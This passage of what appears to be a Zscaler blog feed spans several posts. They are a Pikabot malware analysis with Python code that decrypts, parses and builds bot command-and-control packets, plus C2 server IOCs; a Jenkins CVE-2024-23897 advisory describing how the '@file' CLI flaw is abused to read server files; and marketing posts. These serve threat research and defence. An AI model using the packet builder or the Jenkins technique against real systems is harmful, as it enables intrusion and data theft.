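    0x792: "inject downloaded shellcode",
    0x359: "execute system command",
    0x3A6: "execute system command",
    0x240: "execute system command",
    0x985: "collect process information",
    0x982: "not implemented",
}


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (key scheduling + keystream generation). The same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def build_command(task_id: int, command_id: int, body: bytes) -> bytes:
    """Assumed plaintext layout of a server-to-bot command: QWORD task ID (as the post
    describes), then a DWORD command ID, then the command body. The DWORD width and
    the body position are assumptions of this example."""
    return struct.pack("<QI", task_id, command_id) + body


def parse_command(plaintext: bytes) -> dict:
    """Inverse of build_command: split a decrypted packet into fields and label the
    command ID with its Table 1 description."""
    if len(plaintext) < 12:
        raise ValueError("packet too short for task ID + command ID")
    task_id, command_id = struct.unpack_from("<QI", plaintext, 0)
    return {
        "task_id": task_id,
        "command_id": command_id,
        "description": PIKABOT_COMMANDS.get(command_id, "unknown command"),
        "body": plaintext[12:],
    }


def decrypt_and_parse(session_key: bytes, ciphertext: bytes) -> dict:
    """Strip the RC4 layer with the per-host session key, then parse the packet.
    The byte-swap encoding applied on top of RC4 is not modelled here."""
    return parse_command(rc4(session_key, ciphertext))


def demo() -> dict:
    """Constructed exchange: a 32-byte session key and a 0xACB command carrying the
    system command 'whoami', encrypted the way the bot would receive it."""
    session_key = bytes(range(0x20, 0x40))  # constructed key, not taken from a sample
    wire = rc4(session_key, build_command(0x1122334455667788, 0xACB, b"whoami"))
    return decrypt_and_parse(session_key, wire)


if __name__ == "__main__":
    print(demo())
```

With a real session key recovered from memory, the same decrypt_and_parse call can be pointed at a captured POST body once the swap rounds have been undone; the command-ID lookup then tells an analyst at a glance whether a task was a registration, a beacon update, a command execution or an injection.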
Zscaler ThreatLabz continues to track this threat and add detections to protect our customers.

Indicators Of Compromise (IOCs)

SHA256 | Description
555687ca3149e23ee980a3acf578e0572da556cf34c87aecf48596834d6b496f | Pikabot sample (version 1.8.32-beta)
ca5fb5814ec62c8f04936740aabe2664b3c7d036203afbd8425cd67cf1f4b79d | Pikabot sample (version 1.8.32-beta)

IOC | Description
104.129.55[.]103:2224 | Command-and-control server
178.18.246[.]136:2078 | Command-and-control server
158.220.80[.]167:2967 | Command-and-control server
104.129.55[.]104:2223 | Command-and-control server
23.226.138[.]161:5242 | Command-and-control server
37.60.242[.]85:9785 | Command-and-control server
23.226.138[.]143:2083 | Command-and-control server
37.60.242[.]86:2967 | Command-and-control server
85.239.243[.]155:5000 | Command-and-control server
158.220.80[.]157:9785 | Command-and-control server
65.20.66[.]218:5938 | Command-and-control server
95.179.191[.]137:5938 | Command-and-control server
139.84.237[.]229:2967 | Command-and-control server

Zscaler Coverage

In addition to sandbox detections, Zscaler's multilayered cloud security platform detects indicators related to Pikabot at various levels with the following threat names:
Win32.Trojan.PikaBot
Win32.Downloader.PikaBot

Mon, 12 Feb 2024 10:11:52 -0800 Nikolaos Pantazopoulos https://www.zscaler.com/blogs/security-research/d-evolution-pikabot

Start Your Journey in IT Support: A Beginner's Guide https://www.zscaler.com/blogs/product-insights/start-your-journey-it-support-beginner-s-guide

Navigating the nuances of IT troubleshooting can be challenging, especially if you're just starting out. Our ebook, A Beginner's Guide to Troubleshooting Devices, Networks, and Applications for Service Desk Teams, breaks down the essentials of IT support in a clear, digestible format, making it a great resource for newcomers who are eager to become influential service desk team members. It's a practical guide even for those with limited time.
Whether you're dealing with device issues, network complexities, or application troubleshooting, you'll find step-by-step instructions that are easy to follow even with minimal IT knowledge. We designed this guide to help you enhance your troubleshooting skills, gain the confidence you need to master IT problem-solving, and become a valuable asset to any service desk team. In this ebook, you'll find:

- An overview of service desk challenges: Understand the evolving IT landscape and the pivotal role of IT support in maintaining productivity.
- Step-by-step ticket resolution processes: Learn how to handle and resolve IT issues efficiently while improving customer satisfaction.
- Categorization of IT issues: Familiarize yourself with common problems in devices, networks, and applications, along with strategies to tackle them.
- A focus on device, networking, and application issues: Gain insights into specific challenges in these areas and learn practical solutions.
- Strategies to enhance troubleshooting workflows: Discover how to streamline IT support processes and use advanced technologies for better problem-solving.

It is also an excellent tool for service desk managers to speed up team onboarding. By equipping your team with this resource, you enable them to handle a wide range of IT issues independently, which reduces the need for escalations and empowers analysts to solve problems efficiently. Ultimately, it can not only enhance your service desk team's capabilities but also significantly shorten the time it takes for new analysts to become proficient. Download the ebook today and transform your service desk team!
Fri, 09 Feb 2024 19:14:07 -0800 Rohit Goyal https://www.zscaler.com/blogs/product-insights/start-your-journey-it-support-beginner-s-guide

Cushman & Wakefield's Roadmap for Consolidating and Simplifying Security with Zscaler https://www.zscaler.com/blogs/customer-stories/cushman-wakefield-s-roadmap-consolidating-and-simplifying-security-zscaler

As a CISO leading the cybersecurity program at Cushman & Wakefield, one of the world's largest commercial real estate services firms, I can attest that it has been a truly transformative journey. When I joined the company over five years ago, I had clear priorities: improve SaaS application performance for our distributed, mostly mobile workforce, now more than 52,000 employees; simplify network architecture; and accelerate integration of mergers and acquisitions (M&As). My vision was to evolve Cushman & Wakefield's security approach from a legacy on-premises infrastructure to cloud-based security as a service. As we set our sights on a cloud-first and partner-first model, we aimed to shrink the size and number of our data centers. Our intent was to streamline our infrastructure and build a coordinated security ecosystem with an eye toward gaining operational efficiencies. Equally important was providing our globally dispersed users with faster, more secure access to the more than 200 SaaS applications they rely on every day. To achieve these goals, we turned to the Zscaler Zero Trust Exchange, and it has proven to be the perfect fit for our strategic vision. Zscaler has been at the core of our success and continues to be at the center of our ongoing security transformation journey.

A phased approach to our Zscaler implementation

In 2019, we made a strategic decision to adopt SD-WAN to improve SaaS connectivity across our more than 400 branch offices. That's when we adopted Zscaler.
We selected Zscaler Internet Access (ZIA), part of the Zero Trust Exchange, as our security solution because it interoperates seamlessly with the SD-WAN and enables secure local internet breakouts without the high costs and complexity of on-premises firewall appliances. The joint solution provided consistent protection and significantly better performance for our users on any device, anywhere. Additionally, our security team gained complete visibility into what was happening on the network and who was using which applications. This allowed us to manage bandwidth, prioritize traffic to business-critical applications, and limit the impact of streaming and social media traffic. We are continuing to modernize our branch offices but are moving to a café model, where users can securely connect to corporate resources without VPN or SD-WAN. Zscaler is making this change possible. Looking ahead, we also plan to implement Zscaler Private Access more broadly to provide secure access to private applications as we establish offices in new regions.

Following the user during the pandemic and beyond

At every stage of our implementation, we found that Zscaler delivered value in new ways. Even before the COVID-19 pandemic, a significant portion of our workforce was operating remotely. When the pandemic struck, we were well prepared: Zscaler Client Connector had already been deployed on all devices, so we maintained business continuity. When a leader asked me what my plan was for security at the time, I just shrugged my shoulders and informed him that we already had all our bases covered, with Zscaler and CrowdStrike as the primary components.

Zscaler integrations for a coordinated security ecosystem

After the positive experience of integrating Zscaler with our SD-WAN, we have been impressed by how easy and seamless it is to integrate other tools in our security stack with Zscaler.
Recently, we integrated Zscaler with CrowdStrike for an added layer of protection: Zscaler only allows devices that meet CrowdStrike's Zero Trust Assessment (ZTA) score threshold to access sensitive applications. By sharing real-time threat intelligence, data alerts, and device health information, the Zscaler-CrowdStrike integration has reduced the number of security events. As we move forward with building out our zero trust architecture and creating a unified security ecosystem, we plan to leverage Zscaler's open API more fully to maximize our other security investments. We are looking at ways to broaden threat intelligence sharing, gain more visibility, and engage automation to a greater degree. At the top of my to-do list are integrations with CrowdStrike Falcon LogScale, its next-generation SIEM and log management tool, and with Mimecast, the cloud-based email security and management system used by all our employees.

Future focus: expanding Zscaler capabilities

Risk management

I also look forward to evaluating new AI-powered capabilities like Zscaler Risk360 to gain visibility into risk in all areas of our environment. Once it is in place, Zscaler Risk360's visualization framework will generate risk posture profiles using real data from our environment combined with global security research from Zscaler ThreatLabz. The ability to quickly identify and respond to critical vulnerabilities will enhance our proactive protection, enable us to communicate security priorities in a quantifiable way, and help us build a data-driven case as we advocate for additional resources.

M&A integration

Over the years, most of our growth has been fueled by M&As. We plan on leveraging Zscaler to integrate acquired companies and enable these new users to access business-critical applications in days rather than months.
Combating data loss and insider threats

We are also on a mission to curb data loss overall and to combat insider threats, whether due to negligence or malicious motives. These challenging tasks are made easier by the multi-pronged defense made possible by the zero trust architecture we have in place and continue to build on. By ensuring least-privilege access and preventing lateral movement, we limit the potential damage from abuse of insider access. Zscaler's Zero Trust Exchange plays a critical role in keeping these threats at bay by minimizing the attack surface: users connect only to a single application, not to the network. As we continue on our zero trust journey, enhancing data protection in this age of generative AI engines like ChatGPT is a top priority. Zscaler's inline TLS/SSL traffic inspection will be essential for preventing the leakage of sensitive data by identifying and blocking attempted unauthorized uploads to AI tools and across all our cloud apps. Gaining deeper visibility into user activity is another focus area. While most of our employees are trusted, honest professionals, mistakes happen. By implementing deception tools such as honeypots and lures, our security team will receive alerts that help them detect anomalous insider behavior faster, significantly reducing dwell time for any potential incidents.

A partnership for the long haul

As CISO, my aim is to continue delivering seamless access and robust security for our global staff as we grow our business, expand our presence, and offer new services. The flexible, scalable Zero Trust Exchange aligns with this goal. Our partnership with Zscaler has been integral to Cushman & Wakefield's cloud-first journey. Together, we have shifted from legacy networks to a unified, user-centric security model that enables productivity and protection anywhere. I am confident that our journey toward a more secure and efficient future will continue successfully with Zscaler as our trusted partner.
The results we have achieved thus far speak for themselves. To learn more, read the case study.

Thu, 15 Feb 2024 08:37:55 -0800 Erik Hart https://www.zscaler.com/blogs/customer-stories/cushman-wakefield-s-roadmap-consolidating-and-simplifying-security-zscaler

How Zscaler's Powerful Integrations Help the State of Oklahoma Efficiently Do More with Less https://www.zscaler.com/blogs/customer-stories/how-zscaler-s-powerful-integrations-help-state-oklahoma-efficiently-do-more

On any given day, the security professionals who make up the OMES Oklahoma Cyber Command stay on top of up to 17 million potential threats, ranging from phishing and credential compromise to ransomware and data breaches. Dedicated to securing the digital assets of the State of Oklahoma government, these team members are also stewards of massive amounts of sensitive personal and healthcare data, from our more than 30,000 employees and the nearly 4 million state residents served by our more than 180 agencies. Thanks to the Zscaler Zero Trust Exchange platform, we are successfully managing this high volume of threats and safeguarding the vital data we have been entrusted with. One of the Zscaler superpowers we have come to rely on is its integration capabilities. By working in sync with other components of our security stack, Zscaler has taken us to the next level of our security maturity and zero trust transformation.

Keep pace by unifying security

We know that the spiraling volume of threats will always be a challenge, especially now that cybercriminals are beginning to leverage AI for malicious purposes. When new security challenges emerge, we need to be able to respond at lightning speed. Amid all the change and complexity in the security and technology landscape, I am finding that the solution is to simplify and unify our security infrastructure.
One of the ways we have done that is by taking full advantage of Zscaler's powerful integration capabilities. When you work with a single unified platform, it almost forces efficiency, and it certainly aids in the ongoing battle most state governments face of having to do more with less.

Integrations provide a holistic view

One of the things that differentiates Zscaler from other solutions is its open application programming interface (API), which has made it easy to integrate with our existing security solutions. In our environment, we have found that Zscaler plays well with the other core tools we rely on, namely CrowdStrike and Splunk, in how it shares threat intelligence data and coordinates protection and incident response. The ability to tie these security tools together increases telemetry and gives us the opportunity to stop lateral threats before they become bigger problems that could affect our users and our citizens.

Zscaler-CrowdStrike integration curbs lateral threat movement

By sharing telemetry and threat intelligence data between the CrowdStrike platform and the Zscaler Zero Trust Exchange, access policies can automatically adapt to changing user context, device health, and newly detected threats, making investigation and response faster and more effective. For example, suppose we know an attack is occurring, maybe the next SolarWinds, or a user has just installed a new, unauthorized app that has weakened the endpoint posture. With the Zscaler-CrowdStrike integration, CrowdStrike detects the change, recalculates the Falcon Zero Trust Assessment (ZTA) score, and shares it with Zscaler. Based on the updated ZTA score, Zscaler policy control can automatically apply a stricter threshold that allows access only through a browser isolation session, or even blocks the connection to protect selected mission-critical applications.
Furthermore, sharing telemetry and threat intelligence is key to expanded visibility of the threat landscape, from endpoint to applications. After all, it would not be efficient if one security system knew something was critically important and did not share it with another security domain! As an inline security cloud, Zscaler can intercept unknown zero-day payloads before they reach an endpoint and share the telemetry with CrowdStrike. This helps us quickly assess whether such a payload exists anywhere in the endpoint environment and provides the basis for an automated cross-platform response workflow. This helps stop threats from moving laterally into critical systems, such as a database server housing financial information.

Zscaler-Splunk integration provides a centralized view

The Zscaler-Splunk integration gives us extensive analytics for in-depth visibility into usage, access, and the overall environment. The analytics correlate data, helping us perform proactive threat hunting and investigations by identifying abnormal patterns. Zscaler's log fields map to the same schema Splunk uses, which makes correlation searches easy. Zscaler logs are sent via a secure HTTPS push and delivered reliably to Splunk's HTTP Event Collector. Once in Splunk, the logs are normalized, which allows correlation across all data sources and provides end-to-end visibility. Splunk's robust analytics include risk-based alerting (RBA) and user and entity behavior analytics (UEBA). The tight integration simplifies security operations by reducing the need for our team to constantly swivel from one security console to another to get the information they need. The Splunk analytics dashboard serves as the hub of this wheel of zero trust protection. It shows activity across the enterprise in real time, regardless of user location.
As a result of the Zscaler-Splunk integration, our security operations team has experienced significant gains in speed and efficiency. In the past, I would have needed three to five different solutions to accomplish what Zscaler and its integrations can do on their own. We would not be as far along our path to zero trust as we are now without a platform like the Zscaler Zero Trust Exchange to help us out. It has exponentially improved our cybersecurity, and I am proud to be a part of the amazing things that my team does every day to protect our employees and our citizens. Read the case study to learn more about the State of Oklahoma's Zscaler Zero Trust Exchange deployment.

Thu, 08 Feb 2024 16:11:39 -0800 Michael Toland https://www.zscaler.com/blogs/customer-stories/how-zscaler-s-powerful-integrations-help-state-oklahoma-efficiently-do-more

Now and Next: How Zscaler is Transforming to Fuel Channel Success https://www.zscaler.com/blogs/company-news/now-and-next-how-zscaler-transforming-fuel-channel-success

Looking back at 2023, it was impossible to escape the constant buzz surrounding cybersecurity incidents in the market. But amid the chaos, one thing became clear: the cybersecurity market was booming, and the role of leaders and partners in ensuring customer safety was crucial. The same still rings true in 2024. As the cybersecurity market continues to evolve, Zscaler is proud to be at the forefront of innovation, and now we have put the programs in place to allow our partners to thrive in this digital era alongside us. Both for what's now... and what's next. As we step into the second half of Zscaler's fiscal year, we are proud to showcase to partners the army of new opportunities we have designed to grow their business, maximize earnings, and elevate their skills.
This includes a revamped incentive structure and new selling motions that give partners more collaborative selling opportunities throughout the sales cycle to deliver the best customer experience on their journey to digital transformation.

We have transformed our partnering foundation to provide comprehensive support throughout the customer lifecycle

You have probably heard me say it before: zero trust is a team sport. In the first half of the year, we took on both an internal and an external transformation to ensure that we have purposeful alignment, process, and engagement with our partners throughout the customer lifecycle. This means that from the earliest stages of our world-class sales process to the final delivery, our partners are integrated every step of the way, embedding their services and support to help our customers transition from legacy appliances to a true zero trust model.

We are leading the charge with the market-leading platform, and now the most lucrative incentive framework in the market today

With the most comprehensive platform in the market today, Zscaler leads the charge. And now, we have introduced the most lucrative incentive framework to match. Over the past six months, my team and I hit the road to listen to our partners and understand what they truly want from a partnership. One thing stood out loud and clear: they want to work with vendors who offer the most comprehensive security platform and drive profitability. That is why we have enhanced our incentives framework and channel-led selling motion, offering larger payouts, increased discount advantages, and performance bonuses. We want our partners to earn more and thrive in the cloud security market, establishing themselves as trusted advisors. As the digital landscape continues to evolve, Zscaler remains dedicated to supporting partners in driving customer success and achieving mutual growth.
We are empowering our partners to thrive in the cloud security market and establish themselves as trusted advisors

We know that for Zscaler and our partners alike, our number one commitment is driving customer success in the ever-evolving digital era. That is why Zscaler not only continues to innovate its cloud security offerings to address emerging threats and challenges, but in the first half of our year we also simplified our certifications to help our partners become experts and build practices around zero trust. We also launched targeted enablement around Zscaler-powered customer outcomes to help our partners lead the way as trusted advisors to our customers. But our journey is far from over. As we enter the second half of our fiscal year, we have more exciting announcements lined up to fuel partner success. We will introduce new offerings and specializations to help partners seamlessly integrate Zscaler into their practices. We will optimize our collaborative partnering approach and launch industry-leading tools to make Zscaler the easiest company in the industry to do business with. We will also continue to be in the field with you each and every day, to make sure our valued partners have the support to deliver transformational outcomes to our customers. We have achieved a lot in the first half of the year with your feedback and support throughout this transformative journey. We are fully dedicated to supporting our partners in reaching their maximum potential with Zscaler, both with what's now and what's next. Together, we are changing the channel and revolutionizing the cybersecurity market.
Thu, 08 Feb 2024 05:00:02 -0800 Karl Soderlund https://www.zscaler.com/blogs/company-news/now-and-next-how-zscaler-transforming-fuel-channel-success

Jenkins Arbitrary File Leak Vulnerability, CVE-2024-23897, Can Lead To RCE https://www.zscaler.com/blogs/security-research/jenkins-arbitrary-file-leak-vulnerability-cve-2024-23897-can-lead-rce

Introduction

Jenkins, a Java-based open-source automation server widely used by developers to build, test, and deploy applications, has issued an advisory about a critical vulnerability that could enable remote code execution (RCE). The vulnerability, identified as CVE-2024-23897, affects the Jenkins command line interface (CLI). With a CVSS score of 9.8, it allows unauthorized reads of files on the Jenkins controller through the CLI, which can in turn lead to RCE. Beyond plain text files, CVE-2024-23897 can also be leveraged to read binary files that contain cryptographic keys used by various Jenkins features, albeit with some limitations. Unauthorized access to this sensitive information can result in:

- RCE through the exploitation of resource root URLs
- RCE by forging a "Remember me" cookie
- RCE through stored cross-site scripting (XSS) attacks via build logs
- RCE by bypassing CSRF protection
- Decryption of secrets stored in Jenkins
- Deletion of any item within Jenkins
- Downloading of Java heap dumps

Affected Versions

The vulnerability affects Jenkins weekly releases up to and including 2.441 and LTS (Long-Term Support) releases up to and including 2.426.2.

Technical Details

The vulnerability originates in Jenkins' use of the args4j library to parse command arguments and options on the Jenkins controller while processing CLI commands. A convenience feature of args4j replaces any argument beginning with an "@" character with the contents of the file at that path, and this feature has become a significant security issue.
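To make the mechanism concrete, the following Python is an added model written for this page; it is not Jenkins or args4j code. It mimics the "@file" expansion (each line of the named file becomes one argument, which is what lets file lines surface in error messages) beside a toy CLI command that echoes an unrecognised argument back to the caller, and then runs both with the expansion switched on and off. The `KNOWN_COMMANDS` set, the `help_command` function, the `expand_at_files` switch and the throwaway secret file are all this example's own assumptions; the effect of the switch corresponds to what the fix in 2.442 / LTS 2.426.3 does by disabling the feature.

```python
import tempfile
from pathlib import Path

# Toy command table; real Jenkins has many more CLI commands
KNOWN_COMMANDS = {"help", "version", "who-am-i"}


def expand_at_args(argv: list[str], expand_at_files: bool = True) -> list[str]:
    """Simplified model of args4j's '@file' handling: when enabled, an argument that
    starts with '@' is replaced by the non-empty lines of the named file, one argument
    per line. When disabled, '@...' is kept as an ordinary literal argument."""
    expanded: list[str] = []
    for arg in argv:
        if expand_at_files and arg.startswith("@") and len(arg) > 1:
            lines = Path(arg[1:]).read_text(encoding="utf-8").splitlines()
            expanded.extend(line for line in lines if line)
        else:
            expanded.append(arg)
    return expanded


def help_command(argv: list[str], expand_at_files: bool = True) -> str:
    """Toy 'help' command that echoes an unknown argument in its error message.
    That echo is what turns argument expansion into an arbitrary file read."""
    args = expand_at_args(argv, expand_at_files)
    if not args:
        return "usage: help [COMMAND]"
    if args[0] in KNOWN_COMMANDS:
        return f"help for {args[0]}"
    return f"ERROR: No such command {args[0]}"


def demo() -> tuple[str, str]:
    """Create a throwaway secret file (constructed content) and run the help command
    against '@<path>' twice: with expansion on (leaks the first line) and off (hardened).
    Returns the two error messages."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = Path(tmp) / "secret.txt"
        secret.write_text("s3cr3t-line-1\nline-2\n", encoding="utf-8")
        vulnerable = help_command(["@" + str(secret)], expand_at_files=True)
        hardened = help_command(["@" + str(secret)], expand_at_files=False)
    return vulnerable, hardened


if __name__ == "__main__":
    leaked, safe = demo()
    print("expansion on : ", leaked)
    print("expansion off: ", safe)
```

Only the first line of the file appears in the message because the toy command echoes a single argument; in Jenkins, which arguments end up in the error text depends on the command, which is why the advisory distinguishes between reading a few lines and reading whole files.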
This feature is enabled by default and left unchecked in versions up to 2.441 and LTS 2.426.2. Exploiting it lets attackers read arbitrary files on the Jenkins controller file system, using the default character encoding of the Jenkins controller process. When an argument to a Jenkins CLI command is prefixed with "@", it is interpreted as the path of a file whose lines are to be read as the arguments. In certain cases, those lines are then echoed in error messages and returned to the CLI user.

Two Jenkins configuration options make the issue significantly worse by letting unauthenticated attackers obtain the permissions of an authenticated user. "Allow users to register" lets anyone who can reach the Jenkins instance create an account, and "Enable anonymous read permission" grants Overall/Read to everyone. With either option enabled, any user of the instance can read the entire content of arbitrary files on the Jenkins server; without Overall/Read, an attacker is limited to the first few lines of a file.

Figure 1. Jenkins configuration options

The figure below shows the first rows of C:\Users\IEUser\AppData\Local\Temp\JenkinsTest.txt (a file created on the Jenkins server for demonstration) being read using the CLI help command.

Figure 2. A demonstration text file created on the Jenkins server

There are two ways to trigger this vulnerability:

Using jenkins-cli.jar: This common approach uses jenkins-cli.jar, which connects over WebSocket or SSH. Commands such as shutdown, enable-job, help, and connect-node are abused to read the content of files on the Jenkins server. The figure below shows the help command being run through the Jenkins CLI to read a file.

Figure 3. Running the help command with the Jenkins CLI tool to read file content on Jenkins

The figure below shows the file content read from the Jenkins server.
Figure 4. File content read from the Jenkins server

Sending POST requests: An alternative method sends two POST requests to http://jenkins/cli?remoting=false. This technique requires a downloader and an uploader: the downloader fetches the response of the CLI command, while the uploader submits the CLI command in the body of its request. The two requests are tied together by the UUID in the Session header.

Figure 5. Attack workflow demonstrating the malicious HTTP requests

Recommendations

To mitigate this vulnerability, upgrade to at least Jenkins 2.442 or LTS 2.426.3. The patch disables the argument parser feature responsible for the vulnerability. Those unable to update immediately should disable access to the Jenkins CLI, which is expected to prevent exploitation. For instructions, see the Jenkins documentation for this workaround.

Zscaler Coverage

The Zscaler ThreatLabz team has deployed protection.
Zscaler Advanced Threat Protection: APP.EXPLOIT.CVE-2024-23897

References

- CVE-2024-23897 (CVSS 9.8): Critical Jenkins Security Vulnerability, RCE Possible
- Jenkins Security Advisory 2024-01-24
- CVE-2024-23897.py / poc.py - binganao/CVE-2024-23897 - GitHub
- RCE Jenkins CVE-2024-23897. Background Story | by Syed Abeer Ahmed
- Jenkins 2.441 / LTS 2.426.3 Arbitrary File Read - Packet Storm

Tue, 06 Feb 2024 15:44:05 -0800 Avinash Kumar https://www.zscaler.com/blogs/security-research/jenkins-arbitrary-file-leak-vulnerability-cve-2024-23897-can-lead-rce

IoT/OT Predictions for 2024 https://www.zscaler.com/blogs/product-insights/iot-ot-predictions-2024

How many smart home devices are you running where you live? Smart speakers, thermostats, cameras, light bulbs, etc. Have you lost count yet? You could be forgiven, because Forbes projects there could be as many as 207 billion of these devices out in the world by the end of this year!
By my calculation that works out to more than 25 devices for every human on the planet! In this blog, we will cover some of the top IoT/OT predictions for 2024, covering everything from AI at the edge to ransomware. Let's jump in.

IoT/OT devices will see a higher degree of proliferation than ever before

Losing count of how many devices you have isn't just a nuisance in the workplace; it is a very real problem, particularly from a cybersecurity perspective. The challenge of keeping track of your IoT devices, not to mention keeping them secure, is only going to grow harder with the proliferation of sensors, monitors, point-of-sale systems, and myriad other devices that are feeding our hunger for data. Fortunately, we have been working on that.

Edge AI will make these devices smarter, faster

No predictions blog post for 2024 would be complete without mention of the topic on everyone's lips: artificial intelligence. Edge AI is already finding its way onto some smartphones, and as the technology advances, its inclusion in IoT/OT is inevitable. It will only improve as time passes, increasing the number of autonomous decisions being made without oversight. This can easily be positioned as a benefit, especially in remote locations where humans cannot or do not want to be, but it can also be a risk if mishandled.

5G and other WAN connectivity will evolve to meet the needs of IoT/OT

It seems we have been hearing about 5G forever, but it is now starting to truly gain traction in the workplace as a new way to connect devices via the internet with minimal latency and without requiring a local network infrastructure. And it is not alone: newer versions of the Wi-Fi standard, LPWAN, and even satellite connectivity are also coming to the forefront. This simply means we are able to deploy sensors and other kinds of IoT devices into more locations, including remote and mobile ones, growing the number of potential use cases for the technology.
Digital twins will still serve as proving grounds

The accelerated growth in the number of sensors continues to cultivate the use of digital twins: virtual representations of the world around them that help us visualize and improve remote systems. Once again, the proliferation of IoT sensors will provide an even richer and more accurate view of what we’re monitoring. This will enable us to drive resource optimization and efficiency, and pave the way for the adoption of more sustainable systems.

Taking all of these developments in aggregate, it’s plain to see that when it comes to IoT and OT growth, ‘we ain’t seen nothing yet’! As with all technological advances, there’s the potential that they will make our lives better and businesses more efficient and profitable. At the same time, it’s vital to ensure security is consideration number one when planning their deployment, especially for devices that talk to the internet. This brings us to the flip side of these predictions: the challenges they pose.

Data privacy

The combination of ubiquitous sensors and the rise of AI making use of the data they collect naturally leads us to consider data privacy. Regulations around the world, perhaps most famously the EU’s GDPR, ensure that privacy is a requirement rather than a consideration. The handling of potentially sensitive data is strictly controlled, and its misuse can significantly undermine public confidence, not to mention lead to potentially huge fines. Never is this a greater problem than when such data is leaked or exfiltrated from its owner for potentially nefarious uses.

Ransomware on the (continued) rise

As the Zscaler ThreatLabz team recently reminded us, ransomware attacks have risen sharply over the past year, by over 37% in fact. At the same time, it’s becoming easier than ever to launch such attacks, aided by readily available AI and Ransomware-as-a-Service (RaaS) kits.
The firmware problem

Remember earlier when I asked you if you knew how many devices you have deployed? Here’s another one for you. Of those devices, how many have their firmware up to date? Do you even know what firmware they’re running, so that you can establish this? An IoT device may have been secure on the day it shipped, but as our own computers and smartphones have taught us, regular updates are a fact of life in the cat-and-mouse game of vulnerability management. A single compromised device could be all an attacker needs to begin their hunt for more damage to cause or data to steal.

The ongoing risks presented by legacy security

As the cybersecurity industry continues to incessantly point out, traditional security technology practices, many still employed by IT departments around the world, are fundamentally flawed. The ongoing use of firewalls and VPNs opens the door for lateral movement across networks and geographical boundaries, allowing bad actors the opportunity to reach the countless IoT/OT devices in use. Once the network is compromised, the bounty for an attacker grows ever larger.

All of these challenges and more point to only one conclusion: organizations must adopt a zero trust security architecture in order to protect the IoT and OT devices they will inevitably deploy this year.

Conclusion

On the one hand, the predictions for IoT/OT in 2024 are worth getting excited about. Our world is getting smarter, and advances in devices will no doubt help us drive improvements in our personal and professional lives. But to benefit from them, we must put security first. This doesn’t mean adding more and more roadblocks on the network highways. It means reimagining security and building a framework based on the tenets of zero trust.

If you’re new to zero trust and want to learn more, we’d like to welcome you to one of our monthly introductory live webinars, where you can explore the many benefits of zero trust and why Zscaler delivers it better than anyone else.
Click here and search ‘start here’ to find the next session to sign up for.

Tue, 06 Feb 2024 01:00:02 -0800
Simon Tompson
https://www.zscaler.com/blogs/product-insights/iot-ot-predictions-2024